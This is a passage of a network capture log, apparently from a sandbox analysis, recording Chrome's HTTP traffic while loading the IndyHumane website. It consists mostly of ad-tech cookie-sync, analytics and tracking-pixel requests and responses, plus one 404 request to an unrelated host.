                                                                                                                                                                                                                                                        Host: dpm.demdex.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://pixel-sync.sitescout.com/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:19 UTC817INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:18 GMT
                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        X-TID: VzU267FcQCI=
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                        Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                                                                                                                        P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
                                                                                                                                                                                                                                                        Location: https://dpm.demdex.net/demconf.jpg?et:ibs%7cdata:dpid=82530&dpuuid=8b05cf9f-7156-4e8e-80d8-30a255c1b07a-677f2d75-5553&gdpr=0&gdpr_consent=
                                                                                                                                                                                                                                                        DCS: dcs-prod-irl1-1-v069-071cbe4c4.edge-irl1.demdex.com 0 ms
                                                                                                                                                                                                                                                        set-cookie: demdex=01656638509830825063211454695126882067; Max-Age=15552000; Expires=Tue, 08 Jul 2025 01:59:18 GMT; Path=/; Domain=.demdex.net; Secure; SameSite=None


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        127192.168.2.44991234.254.143.34432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC684OUTGET /load/?p=204&g=700&j=0&buid=8b05cf9f-7156-4e8e-80d8-30a255c1b07a-677f2d75-5553&gdpr=0&gdpr_consent= HTTP/1.1
                                                                                                                                                                                                                                                        Host: loadm.exelator.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://pixel-sync.sitescout.com/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:19 UTC383INHTTP/1.1 204
                                                                                                                                                                                                                                                        server: nginx
                                                                                                                                                                                                                                                        date: Thu, 09 Jan 2025 01:59:19 GMT
                                                                                                                                                                                                                                                        cache-control: no-cache
                                                                                                                                                                                                                                                        x-powered-by: Undertow/1
                                                                                                                                                                                                                                                        p3p: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
                                                                                                                                                                                                                                                        access-control-allow-credentials: true
                                                                                                                                                                                                                                                        p3p: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
                                                                                                                                                                                                                                                        connection: close


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        128192.168.2.44990852.49.239.2264432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:19 UTC682OUTGET /qmap?c=1389&tp=STSC&tpid=8b05cf9f-7156-4e8e-80d8-30a255c1b07a-677f2d75-5553&gdpr=0&gdpr_consent= HTTP/1.1
                                                                                                                                                                                                                                                        Host: sync.crwdcntrl.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://pixel-sync.sitescout.com/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:19 UTC440INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:19 GMT
                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                        X-Server: 10.45.6.229
                                                                                                                                                                                                                                                        Set-Cookie: _cc_cc=ctst;Path=/;Domain=crwdcntrl.net;SameSite=None;Secure
                                                                                                                                                                                                                                                        Location: https://sync.crwdcntrl.net/qmap?c=1389&tp=STSC&tpid=8b05cf9f-7156-4e8e-80d8-30a255c1b07a-677f2d75-5553&gdpr=0&gdpr_consent=&ct=y


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        129192.168.2.44991398.98.135.244432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:19 UTC609OUTGET /up/a9d63b08fec1b65f?cookieQ=1&cntr_url=https%3A%2F%2Findyhumane.org%2F HTTP/1.1
                                                                                                                                                                                                                                                        Host: pixel.sitescout.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        Cookie: _ssuma=eyIyIjoxNzM2Mzg3OTU3OTQ1LCI0IjoxNzM2Mzg3OTU3OTQ1LCIzOSI6MTczNjM4Nzk1Nzk0NSwiNyI6MTczNjM4Nzk1Nzk0NSwiOCI6MTczNjM4Nzk1Nzk0NX0; ssi=49849c23-3428-4558-a196-de2f709756ec#1736387957597
                                                                                                                                                                                                                                                        2025-01-09 01:59:19 UTC463INHTTP/1.1 200
                                                                                                                                                                                                                                                        cache-control: max-age=0,no-cache,no-store
                                                                                                                                                                                                                                                        pragma: no-cache
                                                                                                                                                                                                                                                        expires: Tue, 11 Oct 1977 12:34:56 GMT
                                                                                                                                                                                                                                                        p3p: CP="NON DEVa PSAa PSDa OUR NOR NAV",policyref="/w3c/p3p.xml"
                                                                                                                                                                                                                                                        set-cookie: ssi=49849c23-3428-4558-a196-de2f709756ec#1736387957597; Domain=.sitescout.com; Expires=Fri, 09-Jan-2026 01:59:19 GMT; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                        content-type: image/gif
                                                                                                                                                                                                                                                        content-length: 43
                                                                                                                                                                                                                                                        date: Thu, 09 Jan 2025 01:59:18 GMT
                                                                                                                                                                                                                                                        server: AC1.1
                                                                                                                                                                                                                                                        connection: close
                                                                                                                                                                                                                                                        2025-01-09 01:59:19 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 f0 00 00 00 00 00 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                        Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        130192.168.2.44991434.111.113.624432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:19 UTC771OUTGET /idsync/ex/receive/check?partner_id=2499&partner_device_id=8b05cf9f-7156-4e8e-80d8-30a255c1b07a-677f2d75-5553 HTTP/1.1
                                                                                                                                                                                                                                                        Host: pixel.tapad.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://pixel-sync.sitescout.com/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        Cookie: TapAd_TS=1736387958854; TapAd_DID=dcf9376c-b388-4443-970c-4d2581bbbe3d
                                                                                                                                                                                                                                                        2025-01-09 01:59:19 UTC1095INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:19 GMT
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Mobile
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                        P3P: policyref="http://tapad-taptags.s3.amazonaws.com/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
                                                                                                                                                                                                                                                        Set-Cookie: TapAd_TS=1736387958854;Expires=Mon, 10 Mar 2025 01:59:19 GMT;Path=/;Domain=.tapad.com;Secure;SameSite=None
                                                                                                                                                                                                                                                        Set-Cookie: TapAd_DID=dcf9376c-b388-4443-970c-4d2581bbbe3d;Expires=Mon, 10 Mar 2025 01:59:19 GMT;Path=/;Domain=.tapad.com;Secure;SameSite=None
                                                                                                                                                                                                                                                        Set-Cookie: TapAd_3WAY_SYNCS=;Expires=Mon, 10 Mar 2025 01:59:19 GMT;Path=/;Domain=.tapad.com;Secure;SameSite=None
                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                        Content-Length: 95
                                                                                                                                                                                                                                                        Server: Jetty(11.0.13)
                                                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2025-01-09 01:59:19 UTC95INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 0a 49 44 41 54 08 d7 63 60 00 00 00 02 00 01 e2 21 bc 33 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                        Data Ascii: PNGIHDR%VPLTEz=tRNS@fIDATc`!3IENDB`


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        131192.168.2.449920185.76.79.504432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:19 UTC394OUTGET /SzlpnTAbCvQvG1OvfQpFvzkbU78xQAX7O1sfvzY= HTTP/1.1
                                                                                                                                                                                                                                                        Host: virtual.urban-orthodontics.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:21 UTC165INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:21 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2025-01-09 01:59:21 UTC209INData Raw: 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: cb<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                                                                                                                                                                                                                                                        2025-01-09 01:59:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        132192.168.2.449922216.239.32.1814432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:19 UTC1232OUTPOST /g/collect?v=2&tid=G-RSYQJ6KTLL&gtm=45je5170v9134491864za200&_p=1736387951011&_gaz=1&gcd=13l3l3l3l2l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&gdid=dZTNiMT&ul=en-us&sr=1280x1024&cid=932040568.1736387953&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&pae=1&frm=0&pscdl=noapi&_eu=ABAI&_s=1&dl=https%3A%2F%2Findyhumane.org%2F&dt=IndyHumane%20-%20IndyHumane&sid=1736387958&sct=1&seg=0&en=page_view&_fv=1&_ss=1&_ee=1&tfd=13228 HTTP/1.1
                                                                                                                                                                                                                                                        Host: analytics.google.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Origin: https://indyhumane.org
                                                                                                                                                                                                                                                        X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:19 UTC845INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://indyhumane.org
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:19 GMT
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                        Content-Security-Policy-Report-Only: script-src 'none'; form-action 'none'; frame-src 'none'; report-uri https://csp.withgoogle.com/csp/scaffolding/ascnsrsggc:136:0
                                                                                                                                                                                                                                                        Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to=coop_reporting
                                                                                                                                                                                                                                                        Report-To: {"group":"coop_reporting","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsggc:136:0"}],}
                                                                                                                                                                                                                                                        Server: Golfe2
                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        133192.168.2.449916157.240.0.354432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:19 UTC850OUTGET /tr/?id=1401480206566122&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2F&rl=&if=false&ts=1736387958309&sw=1280&sh=1024&v=2.9.179&r=stable&ec=0&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387955689&coo=false&dpo=LDU&dpoco=0&dpost=0&rqm=GET HTTP/1.1
                                                                                                                                                                                                                                                        Host: www.facebook.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:19 UTC464INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin:
                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                        cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                        Server: proxygen-bolt
                                                                                                                                                                                                                                                        X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=10, mss=1392, tbw=3405, tp=-1, tpl=-1, uplat=0, ullat=0
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:19 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Content-Length: 0


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        134192.168.2.44991734.249.77.2074432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:19 UTC752OUTGET /demconf.jpg?et:ibs%7cdata:dpid=82530&dpuuid=8b05cf9f-7156-4e8e-80d8-30a255c1b07a-677f2d75-5553&gdpr=0&gdpr_consent= HTTP/1.1
                                                                                                                                                                                                                                                        Host: dpm.demdex.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://pixel-sync.sitescout.com/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        Cookie: demdex=01656638509830825063211454695126882067
                                                                                                                                                                                                                                                        2025-01-09 01:59:19 UTC891INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:19 GMT
                                                                                                                                                                                                                                                        Content-Type: image/gif
                                                                                                                                                                                                                                                        Content-Length: 42
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        X-TID: Y8c4UbwBQgo=
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                        Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                                                                                                                        P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        DCS: dcs-prod-irl1-1-v069-0dceb7b49.edge-irl1.demdex.com 2 ms
                                                                                                                                                                                                                                                        set-cookie: dpm=01656638509830825063211454695126882067; Max-Age=15552000; Expires=Tue, 08 Jul 2025 01:59:19 GMT; Path=/; Domain=.dpm.demdex.net; Secure; SameSite=None
                                                                                                                                                                                                                                                        set-cookie: demdex=01656638509830825063211454695126882067; Max-Age=15552000; Expires=Tue, 08 Jul 2025 01:59:19 GMT; Path=/; Domain=.demdex.net; Secure; SameSite=None
                                                                                                                                                                                                                                                        2025-01-09 01:59:19 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                                                                                        Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        135192.168.2.449915157.240.0.354432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:19 UTC942OUTGET /privacy_sandbox/pixel/register/trigger/?id=1401480206566122&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2F&rl=&if=false&ts=1736387958309&sw=1280&sh=1024&v=2.9.179&r=stable&ec=0&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387955689&coo=false&dpo=LDU&dpoco=0&dpost=0&rqm=FGET HTTP/1.1
                                                                                                                                                                                                                                                        Host: www.facebook.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Attribution-Reporting-Eligible: event-source, trigger
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:20 UTC1000INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
